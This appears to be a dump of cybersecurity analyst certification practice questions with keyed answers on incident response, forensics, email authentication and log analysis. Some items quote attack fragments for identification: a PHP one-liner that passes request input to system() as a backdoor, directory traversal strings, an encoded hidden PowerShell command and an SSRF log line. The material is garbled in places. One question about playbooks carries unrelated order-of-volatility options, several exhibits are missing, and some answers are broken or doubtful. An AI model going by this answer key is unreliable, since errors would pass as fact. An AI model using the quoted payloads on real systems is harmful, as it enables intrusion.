A security analyst observes a high volume of SYN flags from an unexpected source toward a web application server within one hour. The traffic is not flagging for any exploit signatures. Which of the following describes this activity? A. A legitimate connection is continuously attempting to establish a connection with a downed web server B. A script kiddie is attempting to execute a DDoS through a ping flood attack C. An attacker is executing reconnaissance activities by mapping which ports are open and closed D. A web exploit attempt is likely occurring and the security analyst is not seeing it

An attacker is executing reconnaissance activities by mapping which ports are open and closed

A SIEM alert is triggered based on execution of a suspicious one-liner on two workstations in the organization's environment. An analyst views the details of these events below: Which of the following statements best describes the intent of the attacker, based on this one-liner? A. Attacker is escalating privileges via JavaScript B. Attacker is utilizing custom malware to download an additional script C. Attacker is executing PowerShell script "AccessToken.ps1" D. Attacker is attempting to install persistence mechanisms on the target machine

Attacker is executing PowerShell script "AccessToken.ps1"

A Chief Information Security Officer has determined through lessons learned and an associated after-actions report that staff members who use legacy applications do not adequately understand how to differentiate between non-malicious emails and phishing emails. Which of the following should the CISO include in an action plan to remediate this issue? A. Awareness training and education B. Replacement of legacy applications C. Organizational governance D. Multifactor authentication on all systems

Awareness training and education

A company was able to reduce triage time by focusing on historical trend analysis. The business partnered with the security team to achieve a 50% reduction in phishing attempts year over year. Which of the following action plans led to this reduced triage time? A. Patching B. Configuration management C. Awareness, education, and training D. Threat models

Awareness, education, and training

A user clicks on a malicious adware link, and the malware successfully downloads to the machine. The malware has a script that invokes command-and-control activity. Which of the following actions is the best way to contain the incident without any additional impact? A. Disable the user account until the malware investigation is complete B. Review EDR information to determine whether the file was detected and quarantined locally C. Block the server on the proxy and firewall D. Submit a recategorization plan

Block the server on the proxy and firewall

Which of the following should be performed first when creating a BCP to ensure that all critical functions and financial implications have been considered? A. Failover test B. Tabletop exercise C. Security policies D. Business impact analysis

Business impact analysis

An analyst has discovered the following suspicious command: "; $xyz = ($_REQUEST['xyz']); system($xyz); echo ""; die; }?> Which of the following would best describe the outcome of the command? A. Cross-site scripting B. Reverse Shell C. Backdoor attempt D. Logic bomb

Backdoor attempt

Which of the following best explains the importance of utilizing an incident response playbook? A. Routing table, registers, physical memory, archival media, hard disk, physical configuration B. Routing table, registers, physical memory, temporary partition, hard disk, physical configuration C. Cache, routing table, physical memory, network topology, temporary partition, hard disk D. Cache, routing table, physical memory, temporary partition, hard disk, physical configuration

Cache, routing table, physical memory, temporary partition, hard disk, physical configuration

Which of the following attributes is part of the Diamond Model of Intrusion Analysis? A. Delivery B. Weaponization C. Command and control D. Capability

Capability

A security analyst needs to support and organization's legal case against a threat actor. Which of the following processes provides the best way to assist in the prosecution of the case? A. Chain of custody B. Evidence gathering C. Securing the scene D. Forensic analysis

Chain of custody

A company's internet-facing web application has been compromised several times due to identified design flaws. The company would like to minimize the risk of these incidents from reoccurring and has provided the developers with better security training. However, the company cannot allocate any more internal resources to the issue. Which of the following are the best options to identify flaws within the system? (choose two) A. Deploying a WAF B. Performing a forensic analysis C. Contracting a penetration test D. Holding a tabletop exercise E. Creating a bug bounty program F. implementing threat modeling

Contracting a penetration test, creating a bug bounty program

During a recent site survey, an analyst discovered a rogue wireless access point on the network. Which of the following actions should be taken first to protect the network while preserving evidence? A. Run a packet sniffer to monitor traffic to and from the access point B. Connect to the access point and examine its log files C. Identify who is connected to the access point and attempt to find the attacker D. Disconnect the access point from the network

Disconnect the access point from the network

A user's computer is performing slower than the day before, and unexpected windows continually open and close. The user did not install any new programs, and after the user restarted the desktop, the issue was not resolved. Which of the following incident response actions should be taken next? A. Restart in safe mode and start a virus scan B. Disconnect from the network and leave the PC turned on C. Contain the device and implement a legal hold D. Reformat and reimage the OS

Disconnect from the network and leave the PC turned on

A Chief Finance Officer receives an email from someone who is possibly impersonating the company's Chief Executive Officer and requesting a financial operation. Which of the following should an analyst use to verify whether the email is an impersonation attempt? A. PKI B. MFA C. SMTP D. DKIM

DKIM (DomainKeys Identified Mail)

Numerous emails were sent to a company's customer distribution list. The customers reported that the emails contained a suspicious link. The company's SOC determined the links were malicious. Which of the following is the best way to decrease these emails? A, DMARC B. DKIM C. SPF D. SMTP

DMARC

Which of the following best explains the importance of the implementation of a secure software development life cycle in a company with an internal development team? A. Increase the product price by using the implementation as a piece of marketing B. Decreases the risks of the software usage and complies with regulatory requirements C. Improves the agile process and decreases the amount of tests before the final deployment D. Translates the responsibility for security flaws to the vulnerability management team

Decreases the risks of the software usage and complies with regulatory requirements

An analyst receives alerts that state the following traffic was identified on the perimeter network firewall: Which of the following best describes the indicator of compromise that triggered the alerts? A. Anomalous activity B. Bandwidth saturation C. Cryptomining D. Denial of service

Denial of Service

After an incident, a security analyst needs to perform a forensic analysis to report complete information to a company stakeholder. Which of the following is most likely the goal of the forensic analysis in this case? A. Provide a full picture of the existing risks B. Notify law enforcement of the incident C. Further contain the incident D. Determine root cause information

Determine root cause information

During an internal code review, software called "ACE" was discovered to have a vulnerability that allows the execution of arbitrary code. The vulnerability is in a legacy, third-party vendor resource that is used by the ACE software. ACE is used worldwide and is essential for many businesses in this industry. Developers informed the Chief Information Security Officer that removal of the vulnerability will take time. Which of the following is the first action to take? A. Look for potential IoCs in the company B. Inform customers about the vulnerability C. Remove the affected vendor resource from the ACE software D. Develop a compensating control until the issue can be fixed permanently

Develop a compensating control until the issue can be fixed permanently

Which of the following is the best framework for assessing how attackers use techniques over an infrastructure to exploit a target's information assets? A. Structured Threat Information Expression B. OWASP testing guide C. Open Source Security Testing Methodology Manual D. Diamond Model of Intrusion Analysis

Diamond Model of Intrusion Analysis

While reviewing the web server logs a security analyst notices the following snippet: ..\../..\../boot.ini Which of the following is being attempted? A. Directory traversal B. Remote file inclusion C. Cross-site scripting D. Remote code execution E. Enumeration of/etc/password

Directory traversal

While reviewing the web server logs, a security analyst notices the following snippet: ..\../..\../boot.ini Which of the following is being attempted? A. Directory traversal B. Remote file inclusion C. Cross-site scripting D. Remote code execution E. Enumeration of /etc/password

Directory traversal

An analyst reviews the following web server log entries: %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/password No attacks or malicious attempts have been discovered. Which of the following most likely describes what took place? A. A SQL injection query took place to gather information from a sensitive file B. A PHP injection was leveraged to ensure that the sensitive file could not be accessed C. Base64 was used to prevent the IPS from detecting the fully encoded string D. Directory Traversal was performed to obtain a sensitive file for further reconnaissance

Directory traversal was performed to obtain a sensitive file for further reconnaissance

A security analyst runs the following command: # nmap -T4 -F 192.168.30.30 Starting nmap 7.6 Host is up (0.13s latency) PORT STATE SERVICE 23/tcp open telnet 443/tcp open https 636/tcp open ldaps Which of the following should the analyst recommend first to harden the system? A. Disable all protocols that do not use encryption B. Configure client certificates for domain services C. Ensure that this system is behind a NGFW D. Deploy a publicly trusted root CA for secure websites

Disable all protocols that do not use encryption

An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:W/RC:R Which of the following represents the exploit code maturity of this critical vulnerability? A. E:U B. S:C C. RC:R D. AV:N E. AC:L

E:U

An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of vulnerabilities: CVSS: 3.1/AV:N/AC: L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:W/RC:R Which of the following represents the exploit code maturity of this critical vulnerability? A. E:U B. S:C C. RC:R D. AV:N E. AC:L

E:U

An analyst is investigating a phishing incident and has retrieved the following as part of the investigation: cmd.exe /c c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - WindowStyle Hidden - ExecutionPolicy Bypass -NoLogo -NoProfile - EncodedCommand <VERY LONG STRING> Which of the following should the analyst use to gather more information about the purpose of this command? A. Echo the command payload content into 'base64 -d' B. Execute the command from a Windows VM C. Use a command console with administrator privileges to execute the code D. Run the command as an unprivileged user from the analyst workstation

Echo the command payload content into 'base64 -d'

A manufacturing company's assembly line machinery only functions on an end-of-life OS. Consequently, no patches exist for several high exploitable OS vulnerabilities. Which of the following is the best mitigating control to reduce the risk of these current conditions? A. Enforce strict network segmentation to isolate vulnerable systems from the production network B. Increase the system resources for vulnerable devices to prevent denial of service C. Perform penetration testing to verify the exploitability of these vulnerabilities D. Develop in-house patches to address these vulnerabilities

Enforce strict network segmentation to isolate vulnerable systems from the production network

Which of the following is the best use of automation in cybersecurity? A. Ensure faster incident detection, analysis, and response B. Eliminate configuration errors when implementing new hardware C. Lower costs by reducing the number of necessary staff D. Reduce the time for internal user access requests

Ensure faster incident detection, analysis, and response

During an incident, analysis need to rapidly investigate by the investigation and leadership teams. Which of the following best describes how PII should be safeguarded during an incident? A. Implement data encryption and close the data so only the company has access B. Ensure permissions are limited in the investigation team and encrypt the data C. Implement data encryption and create a standardized procedure for deleting data that is no longer needed D. Ensure permissions are open only to the company

Ensure permissions are limited in the investigation team and encrypt the data

An organization has established a formal change management process after experiencing several critical system failures over the past year. Which of the following are key factors that the change management process will include in order to reduce the impact of system failures? (choose two) A. Ensure users the document system recovery plan prior to deployment B. Perform a full system-level backup following the change C. Leverage an audit tool to identify changes that are being made D. Identify assets with dependence that could be impacted by the change E. Require diagrams to be completed for all critical systems F. Ensure that all assets are properly listed in the inventory management system

Ensure users the document systems recovery plan prior to deployment, Identify assets with dependence that could be impacted by the change

An organization wants to establish a disaster recovery plan for critical applications that are hosted on premises. Which of the following is the first step to prepare for supporting this new requirement? A. Choose a vendor to utilize for the disaster recovery location B. Establish prioritization of continuity from data and business owners C. Negotiate vendor agreements to support disaster recovery capabilities D. Advise the leadership team that a geographical area for recovery must be defined

Establish prioritization of continuity from data and business owners

A security team identifies several rogue Wi-Fi access points during the most recent network scan. The network scans occur once per quarter. Which of the following controls would best allow the organization to identify rogue devices more quickly? A. Implement a continuous monitoring policy B. Implement BYOD policy C. Implement a portable wireless scanning policy D. Change the frequency of network scans to once per month

Implement a continuous monitoring policy

An analyst is imaging a hard drive that was obtained from the system of an employee who is suspected of going rogue. The analyst notes that the install hash of the evidence drive does not match the resultant hash of the imaged copy. Which of the following best describes the reason for the conflicting investigative findings? A. Chain of custody was not maintained for the evidence drive B. Legal authorization was not obtained prior to seizing the evidence drive C. Data integrity of the imaged drive could not be verified D. Evidence drive imaging was performed without a write blocker

Evidence drive imaging was performed without a write blocker

Exploit code for a recently disclosed critical software vulnerability was publicly available for download for several days before being removed. Which of the following CVSS v.3.1 temporal metrics was most impacted by this exposure? A. Remediation level B. Exploit code maturity C. Report confidence D. Availability

Exploit code maturity

A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next? A. Eradication B. Isolation C. Reporting D. Forensic analysis

Forensic analysis

Which of the following techniques would be best to provide the necessary assurance for embedded software that drives centrifugal pumps at a power plant? A. Containerization B. Manual code reviews C. Static and dynamic analysis D. Formal methods

Formal methods

A company is launching a new application in its internal network, where internal customers can communicate with the service desk. The security team needs to ensure the application will be able to handle unexpected strings with anomalous formats without crashing. Which of the following processes is the most applicable for testing the application to find how it would behave in such a situation? A. Fuzzing B. Code review C. Debugging D. Static analysis

Fuzzing

A company is launching a new application in its internal network, where internal customers can communicate with the service desk. The security team needs to ensure the application will be able to handle unexpected strings with anomalous formats without crashing. Which of the following processes is the most applicable for testing the application to find how it would behave in such a situation? A. Fuzzing B. Coding review C. Debugging D. Static analysis

Fuzzing

An organization identifies a method to detect unexpected behavior, crashes, or reduce leaks in a system by feeding invalid, unexpected, or random data to stress the application. Which of the following best describes this testing methodology? A. Reverse engineering B. Static C. Fuzzing D. Debugging

Fuzzing

A chief Information Security Officer wants to lock down the users ability to change applications that are installed on their Windows system. Which of the following is the best enterprise level solution? A. HIPS B. GPO C. Registry D. DLP

GPO (group policy object)

A security team needs to demonstrate how prepared the team is in the event of a cyberattack. Which of the following would best demonstrate a real-world incident without impacting operations? A. Review lessons-learned documentation and create a playbook B. Gather all internal incident response party members and perform a simulation C. Deploy known malware and document the remediation process D. Schedule a system recovery to the DR site for a few application

Gather all internal incident response party members and perform a simulation

An analyst would like to start automatically ingesting IoCs into the EDR tool. Which of the following sources would be the most cost effective for the analyst to use? A. Government bulletins B. Social media C. Dark web D. Blogs

Government bulletins

SIMULATION Welcome to the Enterprise Help Desk System. Please work the ticket escalated to you in the help desk ticket queue. INSTRUCTIONS Click on the ticket to see the ticket details. Additional content is available on tabs within the ticket. First, select the appropriate issue from the drop-down menu. Then, select the MOST likely root cause from the second drop-down menu. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

High CPU Utilization, wuauclt.exe

A SOC receives several alerts indicating user accounts are connecting to the company's identity provider through non-secure communications. User credentials for accessing sensitive, business-critical systems could be exposed. Which of the following logs should the SOC use when determining malicious intent? A. DNS B. tcpdump C. Directory D. IDS

IDS (intrusion detection system)

A cybersecurity analyst is setting up a security control that monitors network traffic and produces an active response to a security event. Which of the following tools is the analyst configuring? A. EDR B. IPS C. CASB D. WAF

IPS (intrusion prevention system)

A company brings in a consultant to make improvements to its website. After the consultant leaves, a web developer notices unusual activity on the website and submits a suspicious file containing the following code to the security team: Which of the following did the consultant do? A. Implant a backdoor B. Implemented privilege escalation C. Implemented clickjacking D. Patched the web server

Implanted a backdoor

A XSS vulnerability was reported on one of the non-sensitive/non-mission-critical public websites of a company. The security department confirmed the finding and needs to provide a recommendation to the application owner. Which of the following recommendations will best prevent this vulnerability from being exploited? (choose two) A. Implement an IPS in front of the web server B. Enable MFA on the website C. Take the website offline until it is patched D. Implement a compensating control in the source code E. Configure TLS v1.3 on the website F. Fix the vulnerability using a virtual patch at the WAF

Implement a compensating control in the source code, Fix the vulnerability using a virtual patch at the WAF

An XSS vulnerability was reported on one of the public websites of a company. The security department confirmed the finding and needs to provide a recommendation to the application owner. Which of the following will best prevent this vulnerability from being exploited? (choose two) A. Implement an IPS in front of the web server B. Enable MFA on the website C. Take the website offline until it is patched D. Implement a compensating control in the source code E. Configure TLS v1.3 on the website F. Fix the vulnerability using a virtual patch at the WAF

Implement a compensating control in the source code, Fix the vulnerability using a virtual patch at the WAF

A WAF weekly report shows that a daily spike occurs from the same subnet. An open-source review indicates the IP addresses belong to a legitimate internet service provider but have been flagged for DDoS attacks and reconnaissance scanning in the past year. Which of the following activities should a SOC analyst take first in response to these traffic uptick activities? A. Recommend a firewall rule implementation to deny all traffic from the IP subnet B. Continue monitoring because the traffic spike did not cause any security notifications or concerns C. Review the network logs to identify the context of traffic and what action was taken D. Check the resource consumption levels to determine whether the uptick is due to a device performance issue

Review the network logs to identify the context of traffic and what action was taken

A security analyst must assist the IT department with creating a phased plan for vulnerability patching that meets established SLAs. Which of the following vulnerability management elements will best assist with prioritizing a successful plan? A. Affected hosts B. Risk score C. Mitigation strategy D. Annual recurrence

Risk score

A SOC manager reviews metrics from the last four weeks to investigate a recurring availability issue. The manager finds similar events correlating to the times of the reported issues. Which of the following methods would the manager most likely use to resolve the issue? A. Vulnerability assessment B. Root cause analysis C. Recurrence reports D. Lessons learned

Root cause analysis

An organization plans to use an advanced machine-learning tool as a central collection server. The tool will perform data aggregation and analysis. Which of the following should the organization implement? A. SIEM B. Firewalls C. Syslog server D. Flow analysis

SIEM

Which of the following documents sets requirements and metrics for a third party response during an event? A. BIA B. DRP C. SLA D. MOU

SLA

A security analyst needs to block vulnerable ports and disable legacy protocols. The analysis has ensured NetBOIS trio, SMB, and TFTP are blocked and/or disabled. Which of the following additional protocols should the analyst block next? A. LDAPS v3 B. SNMP v1 C. TLS 1.3 D. Kerberos v5

SNMP v1

A SOC analyst determined that a significant number of reported alarms could be closed after removing the duplicates. Which of the following could help the analyst reduce the number of alarms with the least effort? A. SOAR B. API C. XDR D. REST

SOAR

A corporation wants to implement an agent-based endpoint solution to help: - Flag various threats - Review vulnerability feeds - Aggregate data - Provide real-time metrics by using scripting language Which of the following tools should the corporation implement to reach this goal? A. DLP B. Heuristics C. SOAR D. NAC

SOAR

Which of the following would eliminate the need for different passwords for a variety of internal applications? A. CASB B. SSO C. PAM D. MFA

SSO (single sign on)

A security analyst noticed the following entry on a web server log: Warning: fopen (http://127.0.0.1:16) : failed to open stream: Connection refused in /hj/var/www/showimage.php on line 7 Which of the following malicious activities was most likely attempted? A. XSS B. CSRF C. SSRF D. RCE

SSRF (Server-side request forgery)

A security analyst is reviewing a recent vulnerability scan report for a new server infrastructure. The analyst would like to make the best use of time by resolving the most critical vulnerability first. The following is provided: Which of the following should the analyst concentrate remediation efforts on first? A. SVR01 B. SVR02 C. SVR03 D. SVR04

SVR02

A cybersecurity analyst is recommending a solution to ensure emails that contain links or attachments are tested before they reach a mail server. Which of the following will the analyst most likely recommend? A. Sandboxing B. MFA C. DKIM D. Vulnerability scan

Sandboxing

An analyst needs to provide recommendations based on a recent vulnerability scan: Which of the following should the analyst recommend addressing to ensure potential vulnerabilities are identified? A. SMB use domain SID to enumerate users B. SYN scanner C. SSL certificate cannot be trusted D. Scan not performed with admin privileges

Scan not performed with admin privileges

Results of a SOC customer service evaluation indicate high levels of classification with the inconsistent services provided after regular work hours. To address this, the SOC lead drafts a document establishing customer expectations regarding the SOC's performance and quality of services. Which of the following documents most likely fits this description? A. Risk management plan B. Vendor agreement C. Incident response plan D. Service-level agreement

Service-level agreement

Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported? (choose two) A. Signal-shielded bag B. Tamper-evident seal C. Thumb drive D. Crime scene tape E. Write blocker F. Drive duplicator

Signal-shielded bag, Tamper-evident seal

Which of the following features is a key component of Zero trust architecture? A. Single strong source of user identity B. Implementation of IT governance C. Quality assurance D. Internal auditing process

Single strong source of user identity

SIMULATION An organization's website was maliciously altered INSTRUCTIONS Review information in each tab to select the source IP the analyst should be concerned about, the indicator of compromise, and the two appropriate corrective actions

Source IP the analyst should be most concerned about -32.111.16.37 Indicator of Compromise - Modified index.html file Corrective actions: Change the password on the sjames account Block external SFTP access

A cybersecurity analyst has been assigned to the threat-hunting team to create a dynamic detection strategy based on behavioral analysis and attack patterns. Which of the following best describes what the analyst will be creating? A. Bots B. IoCs C. TTPs D. Signatures

TTPs

Before adopting a disaster recovery plan, some team members need to gather in a room to review the written scenarios. Which of the following best describes what the team is doing? A, Simulation B. Tabletop exercise C. Full test D. Parallel test

Tabletop exercise

A security analyst recently used Arachni to perform a vulnerability assessment of a newly developed web application. The analyst is concerned about the following output: Which of the following is the most likely reason for this vulnerability? A. The developer set input validation protection on the specific field of search.aspx B. The developer did not set proper cross-site scripting protections in the header C. The developer did not implement default protections in the web application build D. The developer sis not set proper cross-site request forgery protections

The developer did not set proper cross-site scripting protections in the header

The analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds continue to work. Which of the following is the most likely reason the firewall feed stopped working? A. The firewall service account was locked out B. The firewall was using a paid feed C. The firewall certificate expired D. The firewall failed open

The firewall certificate expired

A newly hired security manager in a SOC wants to improve efficiency by automating routine tasks. Which of the following SOC tasks is most suitable for automation? A. The generation of NIDS rules based on received STIX messages B. The fulfillment of privileged access requests to enterprise domain controllers C. The verification of employee identities prior to initial PKI enrollment D. The analysis of suspected malware binaries captured by an email gateway

The generation of NIDS rules based on received STIX messages

A new SOC manager reviewed findings regarding the strengths and weaknesses of the last tabletop exercise in order to make improvements. Which of the following should the SOC manager utilize to improve the process? A. The most recent audit report B. The incident response playbook C. The incident response plan D. The lessons-learned register

The lessons-learned register

A security analyst reviews the SIEM alert related to a suspicious email and wants to verify the authenticity of the message: SPF=PASS DKIM=FAIL DMARC=FAIL Which of the following did the analyst most likely discover? A. An insider threat altered email security records to mask suspicious DNS resolution traffic B. The message was sent from an authorized mail server but was not signed C. Log normalization corrupted the data as it was brought into the central repository D. The email security software did not process all of the records correctly

The message was sent from an authorized mail server but was not signed

Analyst is creating the final vulnerability report for one of the company's customers. The customer asks for a scanning profile with a CVSS score of 7 or higher. The analyst has confirmed there is no finding for missing database patches, even if false positives have been eliminated by manual checks. Which of the following is the most probable reason for the missing scan result? A. The server was offline at the moment of the scan B. The system was not patched appropriately before the scan C. The scan finding does not match the requirement D. The output of the scan is corrupted

The server was offline at the moment of the scan

Which of the following explains the importance of a timeline when providing an incident response report? A. The timeline contains a real-time record of an incident and provides information that helps to simplify a postmortem analysis B. An incident timeline provides the necessary information to understand the actions to mitigate the threat or risk C. The timeline provides all the information, in the form of a timetable, of the whole incident response process including actions taken D. An incident timeline presents the list of commands executed by an attacker when the system was compromised, in the form of a timeline

The timeline provides all the information, in the form of a timetable, of the whole incident response process including actions taken

A list of IoCs released by a government security organization contains the SHA-256 hash for a Microsoft-signed legitimate binary, svchost.exe. Which of the following best describes the result if security teams add this indicator to their detection signatures? A. This indicator would fire on the majority of Windows devices B. Malicious files with a matching hash would be detected C. Security teams would detect rogue svchost.exe processes in their environment D. Security teams would detect event entries detailing execution of known-malicious svchost.exe processes

This indicator would fire on the majority of Windows devices

Based on an internal assessment, a vulnerability management team wants to proactively identify risks to the infrastructure prior to production deployments. Which of the following best supports this approach? A. Threat modeling B. Penetration testing C. Bug Bounty D. SDLC training

Threat modeling

Which of the following will most likely cause severe issues with authentication and logging? A. Virtualization B. Multifactor authentication C. Federation D. Time synchronization

Time synchronization

Which of the following in the digital forensics is considered a critical activity that often includes a graphical representation of process and operating system events? A. Registry editing B. Network mapping C. Timeline analysis D. Write blocking

Timeline analysis

Which of the following is the best reason to implement an MOU? A. To create a business process for configuration management B. To allow internal departments to understand security responsibilities C. To allow an expectation process to be identified for legacy systems D. To ensure that all metrics on service levels are properly reported

To allow internal departments to understand security responsibilities

Which of the following best explains the importance of communicating with staff regarding the official public communication plan related to incidents impacting the organization? A. To establish what information is allowed to be released by designated employees B. To designate an external public relations firm to represent the organization C. To ensure that all news media outlets are informed at the same time D. To define how each employee will be contacted after an even occurs

To establish what information is allowed to be released by designated employees

Which of the following is the most likely reason for an organization to assign different internal departmental groups during the post-incident analysis and improvement process? A. To expose flaws in the incident management process related to specific work areas B. To ensure all staff members get exposure to the review process and can provide feedback C. To verify that the organization playbook was properly followed throughout the incident D. To allow cross-training for staff who are not involved in the incident response process

To expose flaws in the incident management process related to specific work areas